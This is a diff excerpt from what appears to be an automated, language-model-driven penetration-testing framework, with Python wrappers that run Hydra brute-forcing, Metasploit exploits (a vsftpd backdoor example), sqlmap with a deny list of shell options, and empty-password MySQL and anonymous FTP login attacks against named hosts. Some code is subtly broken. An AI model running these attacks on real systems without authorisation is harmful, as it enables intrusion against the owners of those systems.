#ftp暂时不做指令过滤和变化,只执行匿名攻击
timeout = 0
#lines = instruction.splitlines()
# if(len(lines) > 1):
# modified_code = "\n".join(lines[1:])
# else:
# modified_code = ""
#print(modified_code)
modified_code = "ftp匿名登录测试"
return modified_code,timeout
#对于非sh命令调用的工具,自己实现命令执行的内容
def execute_instruction(self, instruction_old):
ext_params = self.create_extparams()
# 第一步:验证指令合法性
instruction,time_out = self.validate_instruction(instruction_old)
if not instruction:
return False, instruction_old, "该指令暂不执行!","",ext_params
# 过滤修改后的指令是否需要判重?同样指令再执行结果一致?待定---#?
# 第二步:执行指令
#target = instruction_old.split()[1] #有赌的成分!
target = ""
for str in instruction_old.split():
if self.is_ip_domain(str):
target = str
if target:
output = self.test_anonymous_ftp_login(target)
else:
output = f"ftp指令未兼容{instruction_old}"
# 第三步:分析执行结果
analysis = self.analyze_result(output,instruction,"","")
return True, instruction, analysis,output,ext_params
def analyze_result(self, result,instruction,stderr,stdout):
#
return result

61
tools/GobusterTool.py

@ -0,0 +1,61 @@
import re
from tools.ToolBase import ToolBase
class GobusterTool(ToolBase):
def validate_instruction(self, instruction):
'''
指令过滤
1.线程默认调整为-t 5 (没有找到-t 就添加 ---暂时取消
2.*medium.txt 替换为*small.txt --- 暂时取消
3.-p 静默输出只输出有用结果
:param instruction:
:return:
'''
# 定义要修改的参数的正则表达式模式
# thread_pattern = r'-t\s*\d+'
# wordlist_pattern = r'-w\s*(/.*?/.*?-medium\.txt)'
# # 检查是否有 -t 参数,若没有则添加 -t 5
# if not re.search(thread_pattern, instruction):
# instruction += ' -t 5'
#
# # 检查 -w 后面的字典文件,若是 *medium.txt 则换成 *small.txt
# if re.search(wordlist_pattern, instruction):
# instruction = re.sub(wordlist_pattern, lambda m: m.group(0).replace('-medium.txt', '-small.txt'),
# instruction)
timeout = 0
if "-q" not in instruction:
instruction += ' -q'
return instruction,timeout
def analyze_result(self, result,instruction,stderr,stdout):
#指令结果分析 -q后对结果进行提取
#重新生成个结果,400-5个,401-5个,200所有,其他还不知道有什么结果所有
result = ""
i_400 = 0
i_401 = 0
lines = stdout.splitlines()
for line in lines:
if line:
badd = False
if "200" in line:
badd = True
elif "400" in line:
if i_400 < 5: #400有5个页面就可以了
badd = True
i_400 += 1
elif "401" in line:
if i_401 < 5:
badd = True
i_401 += 1
else: #未知项不太确定,先保留
badd = True
if badd:
result +='\n'
result += line
return result
if __name__ == '__main__':
sub = GobusterTool()
gobuster_command = "gobuster dir -u http://haitutech.cn -w /usr/directory-list-2.3-medium.txt -x php,html,zip,bak"
print(sub.validate_instruction(gobuster_command))

31
tools/Hping3Tool.py

@ -0,0 +1,31 @@
# Hping3工具类
from tools.ToolBase import ToolBase
class Hping3Tool(ToolBase):
def validate_instruction(self, instruction):
'''
hping3指令过滤过滤规则
1.需要有-c,若没有则添加-c 5 指定发包5次
2.--flood 以最大速度发送数据包需要禁止
:param instruction:
:return:
'''
timeout = 0
# 拆分原始指令为列表
cmd_parts = instruction.split()
# 过滤掉--flood参数
filtered_parts = [part for part in cmd_parts if part != "--flood"]
# 检查是否包含-c参数
has_c_flag = "-c" in filtered_parts
if not has_c_flag:
# 添加-c 5到指令末尾
filtered_parts.extend(["-c", "10"])
# 重组为字符串
return " ".join(filtered_parts),timeout
def analyze_result(self, result,instruction,stderr,stdout):
#hping3 原结果返回
return result

38
tools/HydraTool.py

@ -0,0 +1,38 @@
import os
import shlex
from tools.ToolBase import ToolBase
class HydraTool(ToolBase):
def validate_instruction(self, instruction):
timeout = 0
#hydra过滤
#hydra -L emails.txt -P passwords.txt pop3://haitutech.cn 像这样针对邮箱爆破,邮箱名不是用户名,需要特殊处理
# 分割指令为参数列表
cmd_parts = shlex.split(instruction)
new_cmd = []
# 获取当前程序所在目录
current_path = os.path.dirname(os.path.realpath(__file__))
#new_pass_path = os.path.join(current_path, "payload", "passwords")
new_pass_path = os.path.join(current_path, "../payload", "passwords")
new_user_path = os.path.join(current_path, "../payload", "users")
i = 0
while i < len(cmd_parts):
part = cmd_parts[i]
new_cmd.append(part)
# 检测到-P参数
if part == "-P" and i + 1 < len(cmd_parts): #密码
# 替换下一参数为指定路径
new_cmd.append(new_pass_path)
i += 1 # 跳过原路径参数
elif part == "-L" and i + 1 < len(cmd_parts): #用户名
# 替换下一参数为指定路径
new_cmd.append(new_user_path)
i += 1 # 跳过原路径参数
i += 1
return " ".join(shlex.quote(p) for p in new_cmd),timeout
def analyze_result(self, result,instruction,stderr,stdout):
#返回结果
return result

15
tools/KubehunterTool.py

@ -0,0 +1,15 @@
#git clone https://github.com/aquasecurity/kube-hunter.git
#pip install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple/
#环境变量设置:echo 'export PATH="$PATH:'$(pwd)'"' >> ~/.bashrc
from tools.ToolBase import ToolBase
class KubehunterTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
return instruction,timeout
def analyze_result(self, result,instruction,stderr,stdout):
#指令结果分析
return result

174
tools/MsfconsoleTool.py

@ -0,0 +1,174 @@
#Metasploit 工具类
import pexpect
import re
import threading
import json
from tools.ToolBase import ToolBase
class MsfconsoleTool(ToolBase):
'''
Metasploit 这样的交互工具保持一个会话析构时结束会话
'''
def __init__(self):
super().__init__()
self.bOK = False
self.msf_lock = threading.Lock() # 线程锁
def __del__(self):
if self.bOK:
self.bOK = False
print("Metasploit Exit!")
def validate_instruction(self, instruction):
timeout = 0
modified_code = ""
#针对有分号的指令情况,一般是一行
if ";" in instruction: #举例:msfconsole -q -x "use exploit/unix/ftp/vsftpd_234_backdoor; set RHOST 192.168.204.137; exploit"
# 正则表达式匹配双引号内的内容
pattern = r'"([^"]*)"'
match = re.search(pattern, instruction)
if match:
modified_code = match.group(1)
#统一把单行,换成多行内容
modified_code = modified_code.replace(";", "\n")
print(modified_code)
else: #针对多行命令格式,
'''
msfconsole
use auxiliary/scanner/smtp/smtp_vuln_cve2011_1764
set RHOSTS 58.216.217.67
run
'''
lines = instruction.splitlines()
if(len(lines) > 1):
modified_code = "\n".join(lines[1:]) #去除第一行的msfconsole命令字符
else: #其他情况,暂不兼容
modified_code = ""
#print(modified_code)
return modified_code,timeout
def parse_msf_output(self,output):
"""
解析MSF运行结果
:param output: run命令的输出文本
:return: 结构化结果字典
"""
result = {
"vulnerable": False,
"details": [],
"raw_output": output
}
# 匹配漏洞状态(示例正则,需根据实际模块输出调整)
vuln_pattern = re.compile(r'$\+$\s+(Vulnerable|Exploit\s+succeeded)')
if vuln_pattern.search(output):
result["vulnerable"] = True
# 提取关键详情(如Banner信息)
detail_pattern = re.compile(r'$\*$\s+(.*?)\n')
result["details"] = detail_pattern.findall(output)
#转换成字符串
result = json.dumps(result)
return result
def parse_exploit_output(self, output):
"""
解析 exploit 命令的输出判断 exploit 是否成功
判断依据
- 如果输出中包含 "failed" 则认为 exploit 失败
- 如果输出中出现 "opened session" "shell"大小写不敏感则认为 exploit 成功
"""
low_output = output.lower()
if "failed" in low_output:
return False, output
if re.search(r'opened\s+session', low_output) or re.search(r'command\s+shell\s+session', low_output) \
or re.search(r'found\s+shell',low_output):
return True, output
# 如无明显标志,可视为失败
return False, output
def remove_ansi_escape_sequences(self,text):
# 这个正则表达式匹配 ANSI 转义序列
ansi_escape = re.compile(r'\x1B(?:[@-Z\\-_]|\[[0-?]*[ -/]*[@-~])')
return ansi_escape.sub('', text)
def execute_msf(self,msf,instruction_old):
#创建扩展参数-局部变量
ext_params = self.create_extparams()
#with self.msf_lock: # 指令执行解释才能交另一个线程处理--如果有的话
#print("开始执行-----")
instruction,time_out = self.validate_instruction(instruction_old)
if not instruction:
ext_params.is_user = True
return False,instruction_old,"该指令暂不执行!","",ext_params
cmds = [cmd.strip() for cmd in instruction.splitlines() if cmd.strip()]
results = {}
for cmd in cmds:
msf.sendline(cmd)
# 等待指令执行完成(匹配提示符或超时) #这里要不要用try待验证
index = msf.expect([pexpect.TIMEOUT,'msf6','Command shell session','Exploit completed',
'exploit failed'],timeout=5*60)
if index == 0:#超时
print(f"{cmd}执行超时!")
# 捕获输出
output = self.remove_ansi_escape_sequences(msf.before)
#提取输出信息
if cmd.startswith("use") and "Failed to load module" in output:
ext_params.is_user = True
return True, instruction, "Failed to load module", "",ext_params
if cmd == "run":
results = self.parse_msf_output(output)
elif cmd == "exploit":
success = False
if index != 2: #执行成功,建立了会话
success,exploit_output = self.parse_exploit_output(output)
if not success:
return True, instruction, f"Exploit 执行失败--{exploit_output}", exploit_output,ext_params
if index ==2 or success:#暂时认定commadn shell session 就认定是是利用成功
# 如果 exploit 成功,发送 background 命令以返回 msfconsole 提示符
ext_params["is_vulnerability"] = True #识别出弱点
# msf.sendline("background") #判断成功是因为需要提交background
# try:
# msf.expect("msf6", timeout=60)
# except pexpect.TIMEOUT:
# print("****msf退出子会话失败****")
# #return False, instruction, "发送 background 命令超时", ""
results = "exploit 利用成功!"
else:
results = f"exploit_output:{output}"
# 第三步:分析执行结果
analysis = self.analyze_result(results,instruction,"","")
return True,instruction, analysis,results,ext_params
#对于非sh命令调用的工具,自己实现命令执行的内容
def execute_instruction(self, instruction_old):
try:
# 启动msfconsole进程
msf = pexpect.spawn('msfconsole', encoding='utf-8', timeout=120)
msf.expect('msf6')
#执行msf指令
res,instr, result,source_result,ext_params = self.execute_msf(msf,instruction_old)
#结束msf
msf.sendline('exit')
msf.close()
#返回结果
return res,instr, result,source_result,ext_params
except pexpect.TIMEOUT:
print("[错误] msfconsole启动超时,可能原因:环境配置错误或资源不足")
msf.close()
except pexpect.EOF:
print("[错误] msfconsole进程异常终止")
if msf:
msf.close()
ext_params = self.create_extparams()
ext_params.is_user = True # 提交人工确认异常
return False, instruction_old, "Metasploit 未成功运行!", "", ext_params
def analyze_result(self, result,instruction,stderr,stdout):
#
return result

64
tools/MysqlTool.py

@ -0,0 +1,64 @@
#mysql
#pip install mysql-connector-python
import mysql.connector
from mysql.connector import Error
from tools.ToolBase import ToolBase
class MysqlTool(ToolBase):
def test_empty_password_mysql_connection(self,host, username='root'):
"""
测试使用空密码连接到指定 MySQL 服务器
参数:
host (str): MySQL 服务器的主机地址例如 'haitutech.cn'
username (str): MySQL 用户名默认值为 'root'
"""
try:
# 尝试使用空密码连接 MySQL
connection = mysql.connector.connect(
host=host, # 主机地址
user=username, # 用户名
password='', # 空密码
connection_timeout=10 # 设置10秒连接超时
)
if connection.is_connected():
res = f"成功连接到 {host},用户 {username} 使用空密码"
connection.close() # 关闭连接以释放资源
except Error as e:
# 捕获并打印连接错误
res = f"连接失败: {host} - {e}"
return res
def validate_instruction(self, instruction):
#mysql暂只执行空密码攻击
timeout = 0
modified_code = "mysql空密码登录测试"
return modified_code,0
#对于非sh命令调用的工具,自己实现命令执行的内容
def execute_instruction(self, instruction_old):
ext_params = self.create_extparams()
# 第一步:验证指令合法性
instruction,time_out = self.validate_instruction(instruction_old)
if not instruction:
return False, instruction_old, "该指令暂不执行!","",ext_params
# 过滤修改后的指令是否需要判重?同样指令再执行结果一致?待定---#?
# 第二步:执行指令
target = ""
parts = instruction_old.split()
for i, part in enumerate(parts):
if part == "-h" and i + 1 < len(parts):
target = parts[i + 1]
output = self.test_empty_password_mysql_connection(target)#弱密码攻击如何处理?
# 第三步:分析执行结果
analysis = self.analyze_result(output,instruction,"","")
# 指令和结果入数据库
# ?
return True, instruction, analysis,output,ext_params
def analyze_result(self, result,instruction,stderr,stdout):
#
return result

13
tools/NcTool.py

@ -0,0 +1,13 @@
from tools.ToolBase import ToolBase
class NcTool(ToolBase):
def validate_instruction(self, instruction):
timeout = 60
#指令过滤
if "<<<" in instruction:
instruction = f"bash -c \"{instruction}\""
return instruction,timeout
def analyze_result(self, result,instruction,stderr,stdout):
#指令结果分析
return result

22
tools/NiktoTool.py

@ -0,0 +1,22 @@
# Nikto工具类
import re
from tools.ToolBase import ToolBase
class NiktoTool(ToolBase):
def validate_instruction(self, instruction):
'''
检查指令,过滤规则----暂时屏蔽一些高性能参数
1.-ssl 强制启用 SSL/TLS 连接扫描若目标服务器未优化加密处理可能导致资源消耗过大
:param instruction:
:return:
'''
timeout = 0
# 使用正则表达式匹配 -ssl 参数及其相邻的空格
cleaned_command = re.sub(r'\s+-ssl\b|\b-ssl\b', '', instruction, flags=re.IGNORECASE)
# 处理可能残留的多余空格
return re.sub(r'\s+', ' ', cleaned_command).strip(),timeout
def analyze_result(self, result,instruction,stderr,stdout):
# 检查结果
return result

69
tools/NmapTool.py

@ -0,0 +1,69 @@
# Nmap工具类
import re
from typing import List, Dict, Any
from tools.ToolBase import ToolBase
# Nmap工具类
class NmapTool(ToolBase):
def validate_instruction(self, instruction):
#nmap过滤
timeout = 0
return instruction,timeout
def parse_nmap_output(self,nmap_output: str) -> Dict[str, Any]:
"""
分析 nmap 扫描输出提取常见信息
- 端口信息端口号状态服务版本
- banner 信息脚本输出部分
- OS 信息
- 原始输出作为补充
如果输出为空或分析过程中出现异常则返回错误信息
"""
result: Dict[str, Any] = {}
# 判断输出是否为空
if not nmap_output.strip():
result['error'] = "nmap 输出为空或无效"
return result
try:
# 1. 提取端口信息
# 这里匹配类似:
# 10001/tcp open softether-vpn-mgr SoftEther VPN Server Manager 4.34 Build 9749
port_pattern = re.compile(
r"(?P<port>\d+/tcp)\s+(?P<state>\S+)\s+(?P<service>\S+)(?:\s+(?P<version>.+))?"
)
ports: List[Dict[str, str]] = []
for match in port_pattern.finditer(nmap_output):
port_info = match.groupdict()
# 如果version为空,则设置为空字符串
port_info["version"] = port_info.get("version") or ""
ports.append(port_info)
result['ports'] = ports if ports else "No port info found"
# 2. 提取 banner 信息
# 这里匹配以"| "开头的行
banner_pattern = re.compile(r"^\|\s+(.*)", re.MULTILINE)
banners = [line.strip() for line in banner_pattern.findall(nmap_output)]
result['banners'] = banners if banners else "No banner info found"
# 3. 提取 OS 信息
# 常见格式:Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
os_match = re.search(r"Service Info:\s+OS:\s*([^;]+);", nmap_output, re.IGNORECASE)
result['os_info'] = os_match.group(1).strip() if os_match else "No OS info found"
# 4. 其他信息:原始输出作为补充
result['raw'] = nmap_output
except Exception as e:
result['error'] = f"Error parsing nmap output: {e}"
return result
def analyze_result(self, result,instruction,stderr,stdout):
# 检查结果
start_index = result.find("If you know the service/version")
if start_index != -1:
return result[:start_index]
#result = self.parse_nmap_output(result)
return result

14
tools/NslookupTool.py

@ -0,0 +1,14 @@
from tools.ToolBase import ToolBase
class NslookupTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
return instruction,timeout
def analyze_result(self, result,instruction,stderr,stdout):
#指令结果分析
start_index = result.find("Non-authoritative answer:")
if start_index != -1:
return result[start_index:]
return result

67
tools/OpensslTool.py

@ -0,0 +1,67 @@
from tools.ToolBase import ToolBase
from cryptography import x509
from cryptography.hazmat.backends import default_backend
from cryptography.x509 import NameOID
import re
import json
class OpensslTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
return instruction,timeout
def parse_name(self,name):
"""解析X509名称对象为结构化字典"""
return {
NameOID.COUNTRY_NAME: name.get_attributes_for_oid(NameOID.COUNTRY_NAME),
NameOID.STATE_OR_PROVINCE_NAME: name.get_attributes_for_oid(NameOID.STATE_OR_PROVINCE_NAME),
NameOID.LOCALITY_NAME: name.get_attributes_for_oid(NameOID.LOCALITY_NAME),
NameOID.ORGANIZATION_NAME: name.get_attributes_for_oid(NameOID.ORGANIZATION_NAME),
NameOID.COMMON_NAME: name.get_attributes_for_oid(NameOID.COMMON_NAME),
NameOID.ORGANIZATIONAL_UNIT_NAME: name.get_attributes_for_oid(NameOID.ORGANIZATIONAL_UNIT_NAME),
}
def parse_ssl_info(self,output):
# 提取证书内容
certs = re.findall(
r'-----BEGIN CERTIFICATE-----(.*?)-----END CERTIFICATE-----',
output,
re.DOTALL
)
results = []
cert_obj = None
for cert in certs:
cert_data = "-----BEGIN CERTIFICATE-----" + cert + "-----END CERTIFICATE-----"
try:
cert_obj = x509.load_pem_x509_certificate(cert_data.encode(), default_backend())
except ValueError as e:
print(f"证书加载失败:{str(e)}")
continue
san_list = []
try:
san_ext = cert_obj.extensions.get_extension_for_class(x509.SubjectAlternativeName)
san_list = san_ext.value.get_values_for_type(x509.DNSName)
except x509.ExtensionNotFound:
pass
results.append({
'subject': str(cert_obj.subject),
'issuer': str(cert_obj.issuer),
'san': str(san_list),
'validity': {
'start': str(cert_obj.not_valid_before),
'end': str(cert_obj.not_valid_after)
},
'signature_algorithm': str(cert_obj.signature_algorithm_oid._name)
})
return results
def analyze_result(self, result,instruction,stderr,stdout):
#指令结果分析
result = self.parse_ssl_info(stdout)
result = json.dumps(result)
return result

80
tools/PythonTool.py

@ -0,0 +1,80 @@
#python代码动态执行
from tools.ToolBase import ToolBase
class PythonTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
return "",timeout
def execute_instruction(self, instruction_old):
'''
执行指令验证合法性 -> 执行 -> 分析结果
:param instruction_old:
:return:
bool:true-正常返回给大模型false-结果不返回给大模型
str:执行的指令
str:执行指令的结果
'''
ext_params = self.create_extparams()
# 定义允许的内置函数集合
allowed_builtins = {
"abs": abs,
"all": all,
"any": any,
"bool": bool,
"chr": chr,
"dict": dict,
"float": float,
"int": int,
"len": len,
"list": list,
"max": max,
"min": min,
"print": print,
"range": range,
"set": set,
"str": str,
"sum": sum,
"type": type,
# 根据需要可以添加其他安全的内置函数
}
# 第一步:验证指令合法性
instruction,time_out = self.validate_instruction(instruction_old)
if not instruction:
return False, instruction_old, "该指令暂不执行!","",ext_params
# 过滤修改后的指令是否需要判重?同样指令再执行结果一致?待定---#?
# 第二步:执行指令
output = ""
# 构造安全的全局命名空间,只包含我们允许的 __builtins__
safe_globals = {
"__builtins__": allowed_builtins,
}
try:
# 编译代码
code_obj = compile(instruction, filename="<dynamic>", mode="exec")
# 在限制环境中执行代码
exec(code_obj, safe_globals)
except Exception as e:
print(f"执行动态代码时出错: {e}")
# 第三步:分析执行结果
analysis = self.analyze_result(output, instruction,"","")
# 指令和结果入数据库
# ?
if not analysis: # analysis为“” 不提交LLM
return False, instruction, analysis,"",ext_params
return True, instruction, analysis,"",ext_params
def analyze_result(self, result,instruction,stderr,stdout):
#指令结果分析
return result
if __name__ == "__main__":
llm_code = """
def run_test():
return 'Penetration test executed successfully!'
"""

29
tools/SearchsploitTool.py

@ -0,0 +1,29 @@
from tools.ToolBase import ToolBase
import re
import json
class SearchsploitTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
return instruction,timeout
def analyze_result(self, result,instruction,stderr,stdout):
"""去除 ANSI 颜色码"""
ansi_escape = re.compile(r'\x1B(?:[@-Z\\-_]|\[[0-?]*[ -/]*[@-~])')
clean_result = ansi_escape.sub('', result)
#指令结果分析
lines = clean_result.split("\n")
exploits = []
for line in lines:
match = re.match(r"(.+?)\s+\|\s+(\S+)", line)
if match:
title = match.group(1).strip()
path = match.group(2).strip()
exploits.append({"title": title, "path": path})
if len(exploits) > 0:
result = json.dumps(exploits) #需要转化成字符串-必须
else:
result = "没有检索到漏洞利用脚本"
return result

30
tools/SmtpuserenumTool.py

@ -0,0 +1,30 @@
import os
import shlex
from tools.ToolBase import ToolBase
class SmtpuserenumTool(ToolBase):
def validate_instruction(self, instruction):
timeout = 0
# 分割指令为参数列表
cmd_parts = shlex.split(instruction)
new_cmd = []
# 获取当前程序所在目录
current_path = os.path.dirname(os.path.realpath(__file__))
new_user_path = os.path.join(current_path, "../payload", "users")
i = 0
while i < len(cmd_parts):
part = cmd_parts[i]
new_cmd.append(part)
# 检测到-P参数
if part == "-U" and i + 1 < len(cmd_parts): # 用户名
# 替换下一参数为指定路径
new_cmd.append(new_user_path)
i += 1 # 跳过原路径参数
i += 1
return " ".join(shlex.quote(p) for p in new_cmd),timeout
def analyze_result(self, result,instruction,stderr,stdout):
#指令结果分析
return result

18
tools/SmugglerTool.py

@ -0,0 +1,18 @@
import os
import shlex
from tools.ToolBase import ToolBase
class SmugglerTool(ToolBase):
def validate_instruction(self, instruction_old):
timeout = 0
#指令过滤
# 获取当前程序所在目录
current_path = os.path.dirname(os.path.realpath(__file__))
# 分割指令为参数列表
newcmd = f"python {current_path}/../payload/smuggler-master/smuggler.py"
instruction = instruction_old.replace("smuggler",newcmd)
return instruction,timeout
def analyze_result(self, result,instruction,stderr,stdout):
#指令结果分析
return result

41
tools/SqlmapTool.py

@ -0,0 +1,41 @@
# Sqlmap工具类
import shlex
from tools.ToolBase import ToolBase
class SqlmapTool(ToolBase):
def validate_instruction(self, instruction):
timeout = 0
# 检查sqlmap高风险参数
high_risk_params = [
"--os-shell",
"--os-cmd",
"--os-pwn",
"--os-sql-shell",
"--file-read",
"--file-write",
"--reg-add",
"--reg-del",
"--eval"
]
# 将命令转换为小写,确保判断不区分大小写
cmd_lower = instruction.lower()
for param in high_risk_params:
if param in cmd_lower:
return ""
#检查--batch
parts = shlex.split(cmd_lower)
if "--batch" not in parts:
parts.append("--batch")
return " ".join(shlex.quote(part) for part in parts),timeout
def analyze_result(self, result,instruction,stderr,stdout):
# 检查结果中是否包含"vulnerable",表示SQL注入漏洞
return "发现SQL注入漏洞" if "vulnerable" in result else "未发现SQL注入漏洞"
if __name__ == "__main__":
ST = SqlmapTool()
strcmd = "sqlmap -u \"http://haitutech.cn/news?id=1\" --os-shell --reg-add --reg-key=\"Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" --reg-value=ProxyEnable --reg-data=0 --reg-type=REG_DWORD"
res,time_out = ST.validate_instruction(strcmd)
print("11")
print(res)

12
tools/SshTool.py

@ -0,0 +1,12 @@
from tools.ToolBase import ToolBase
class SshTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
return instruction,timeout
def analyze_result(self, result,instruction,stderr,stdout):
#指令结果分析
return result

11
tools/SslscanTool.py

@ -0,0 +1,11 @@
from tools.ToolBase import ToolBase
class SslscanTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
return instruction,timeout
def analyze_result(self, result,instruction,stderr,stdout):
#指令结果分析
return result

13
tools/Sublist3rTool.py

@ -0,0 +1,13 @@
from tools.ToolBase import ToolBase
'''
apt install sublist3r
'''
class Sublist3rTool(ToolBase):
def validate_instruction(self, instruction):
timeout = 0
return instruction,timeout
def analyze_result(self, result,instruction,stderr,stdout):
#指令结果分析
return result

135
tools/TelnetTool.py

@ -0,0 +1,135 @@
'''
# SMTP命令注入测试(手动交互)
telnet haitutech.cn 25
EHLO attacker.com
MAIL FROM: <admin@haitutech.cn>
RCPT TO: <target@example.com> NOTIFY=SUCCESS,FAILURE
'''
import socket
from tools.ToolBase import ToolBase
class TelnetTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
return instruction,timeout
def analyze_result(self, result,instruction,stderr,stdout):
#指令结果分析
return result
def smtp_injection_test(self,cmd_str: str):
"""
测试 SMTP 命令注入漏洞
参数:
cmd_str: 多行字符串其中第一行为类似 "telnet haitutech.cn 25"
后续行为具体的 SMTP 命令例如
EHLO attacker.com
MAIL FROM: <admin@haitutech.cn>
RCPT TO: <target@example.com> NOTIFY=SUCCESS,FAILURE
返回:
如果 RCPT 命令响应以 250 开头认为可能存在漏洞返回 True
否则认为安全或不支持该注入返回 False
"""
lines = cmd_str.strip().splitlines()
if not lines:
print("未提供命令")
return ""
# 解析第一行,格式应为:telnet host port
parts = lines[0].strip().split()
if len(parts) < 3:
print("第一行格式错误,预期格式: 'telnet host port'")
return ""
host = parts[1]
try:
port = int(parts[2])
except ValueError:
print("端口转换失败")
return ""
last_response = ""
if port == 25:
try:
# 建立 TCP 连接
s = socket.create_connection((host, port), timeout=10)
except Exception as e:
#print("连接失败:", e)
return f"连接失败:{e}"
# 读取 SMTP Banner
try:
banner = s.recv(1024).decode('utf-8', errors='ignore')
print("Banner:", banner.strip())
except Exception as e:
#print("读取 Banner 失败:", e)
s.close()
return f"读取 Banner 失败:{e}"
# 从第二行开始发送 SMTP 命令
for line in lines[1:]:
cmd = line.strip()
if not cmd:
continue
print("发送命令:", cmd)
try:
s.send((cmd + "\r\n").encode())
except Exception as e:
print("发送命令失败:", e)
s.close()
return ""
try:
response = s.recv(1024).decode('utf-8', errors='ignore')
print("收到响应:", response.strip())
last_response = response.strip()
except Exception as e:
print("读取响应失败:", e)
s.close()
return f"读取响应失败:{e}"
s.close()
else:
return ""
# 以 RCPT 命令的响应作为判断依据
# 注意:对于支持 DSN 的服务器,250 可能是合法的响应,
# 但在不支持的情况下,若返回 250 则可能说明命令注入导致了不正常的处理。
if last_response.startswith("250"):
return "RCPT 命令返回 250,可能存在 SMTP 命令注入风险。"
else:
return "RCPT 命令返回非 250 响应,暂未发现注入风险。"
def execute_instruction(self, instruction_old):
'''
执行指令验证合法性 -> 执行 -> 分析结果
:param instruction_old:
:return:
bool:true-正常返回给大模型false-结果不返回给大模型
str:执行的指令
str:执行指令的结果
'''
ext_params = self.create_extparams()
# 第一步:验证指令合法性
instruction,time_out = self.validate_instruction(instruction_old)
if not instruction:
return False,instruction_old,"该指令暂不执行!","",ext_params
#过滤修改后的指令是否需要判重?同样指令再执行结果一致?待定---#?
# 第二步:执行指令
output = self.smtp_injection_test(instruction)
# 第三步:分析执行结果
analysis = self.analyze_result(output,instruction,"","")
#指令和结果入数据库
#?
if not analysis: #analysis为“” 不提交LLM
return False,instruction,analysis,output,ext_params
return True,instruction, analysis,output,ext_params
if __name__ == "__main__":
pass

142
tools/ToolBase.py

@ -0,0 +1,142 @@
# 工具基类
'''
工具基类----工具子类约束
1.一个工具子类一个py文件
2.工具类文件名必须为[指令名]+Tool.py
3.未完成的工具子类以__开头
4.
'''
import abc
import subprocess
import argparse
import sys
from myutils.ReturnParams import ReturnParams
class ToolBase(abc.ABC):
def __init__(self):
#self.res_type = 0 #补充一个结果类型 0-初始状态,1-有安全问题,
#由于工具类会被多个线程调用,不能有全局变量
pass
def create_extparams(self):
ext_params = ReturnParams()
ext_params["is_user"] = False # 是否要提交用户确认 -- 默认False
ext_params["is_vulnerability"] = False # 是否是脆弱点
return ext_params
def parse_sublist3r_command(self,command):
parser = argparse.ArgumentParser(add_help=False) #创建命令行参数解析器对象‌
parser.add_argument("-o ", "--output", type=str) #添加需要解析的参数规则‌
parser.add_argument("-oN ", "--Noutput", type=str) #nmap
parser.add_argument("-output ", "--nikto", type=str) #nikto
args, _ = parser.parse_known_args(command.split()[1:])
return args
def read_output_file(self,filename):
"""
读取 -o 参数指定的文件内容
"""
try:
with open(filename, "r") as f:
return f.read()
except FileNotFoundError:
print(f"错误: 文件 {filename} 不存在")
except PermissionError:
print(f"错误: 无权限读取文件 {filename}")
return ""
def execute_instruction(self, instruction_old):
'''
执行指令验证合法性 -> 执行 -> 分析结果
*****如果指令要做验证只做白名单所有逻辑不是全放开就是白名单*****
:param instruction_old:
:return:
bool:true-正常返回给大模型处理下一步false-结果不返回给大模型,2--需要人工确认的指令
str:执行的指令
str:执行指令的结果-解析过滤后的结果--也是提交给LLM的结果
str:执行指令的结果-原结果
object:补充参数-封装一个对象 0-不知是否攻击成功1-明确存在漏洞2-明确不存在漏洞
'''
ext_params = self.create_extparams()
# 第一步:验证指令合法性
instruction,timeout = self.validate_instruction(instruction_old)
if not instruction:
ext_params.is_user= True
return False,instruction_old,"该指令暂不执行!由用户确认是否要兼容支持","",ext_params #未
#过滤修改后的指令是否需要判重?同样指令再执行结果一致?待定---#?
# 第二步:执行指令
#print(f"执行指令:{instruction}")
output = ""
stdout = ""
stderr = ""
try:
if timeout == 0:
result = subprocess.run(instruction, shell=True, capture_output=True, text=True)
elif timeout >0:
result = subprocess.run(instruction, shell=True, capture_output=True, text=True, timeout=timeout)
else:
print("timeout参数错误")
#output = result.stdout if result.stdout else result.stderr
#-o 的命令需要处理
parsed_arg = self.parse_sublist3r_command(instruction)
if parsed_arg.output:
output = self.read_output_file(parsed_arg.output)
elif parsed_arg.Noutput:
output = self.read_output_file(parsed_arg.Noutput)
elif parsed_arg.nikto:
output = self.read_output_file(parsed_arg.nikto)
else:
stderr = result.stderr
stdout = result.stdout
except subprocess.TimeoutExpired as e:
stdout = e.stdout if e.stdout is not None else ""
stderr = e.stderr if e.stderr is not None else ""
ext_params.is_user = True #对于超时的也需要人工进行确认,是否是预期的超时
except Exception as e:
ext_params.is_user = True
return False,instruction,f"执行失败:{str(e)}","",ext_params #执行失败,提交给人工确认指令的正确性
# 第三步:分析执行结果
output = stdout
if stderr:
output += stderr
analysis = self.analyze_result(output,instruction,stderr,stdout)
#指令和结果入数据库
#?
if not analysis: #analysis为“” 不提交LLM
ext_params.is_user = True
return False,instruction,analysis,output,ext_params
return True,instruction, analysis,output,ext_params
@abc.abstractmethod
def validate_instruction(self, instruction:str):
"""指令合法性分析
:return:
str非空代表合法函数内会涉及修改指令为空代表非法已取消指令
int表示超时时间0不设置超时时间正值具体的超时时间设置单位秒
"""
pass
@abc.abstractmethod
def analyze_result(self, result:str,instruction:str,stderr:str,stdout:str) -> str:
"""分析执行结果"""
pass
def read_output_file_test(filename):
"""
读取 -o 参数指定的文件内容
"""
try:
with open(filename, "r") as f:
return f.read()
except FileNotFoundError:
print(f"错误: 文件 {filename} 不存在")
except PermissionError:
print(f"错误: 无权限读取文件 {filename}")
return ""
if __name__ =="__main__":
pass

11
tools/WhatwebTool.py

@ -0,0 +1,11 @@
from tools.ToolBase import ToolBase
class WhatwebTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
return instruction,timeout
def analyze_result(self, result,instruction,stderr,stdout):
#指令结果分析
return result

21
tools/WhoisTool.py

@ -0,0 +1,21 @@
import re
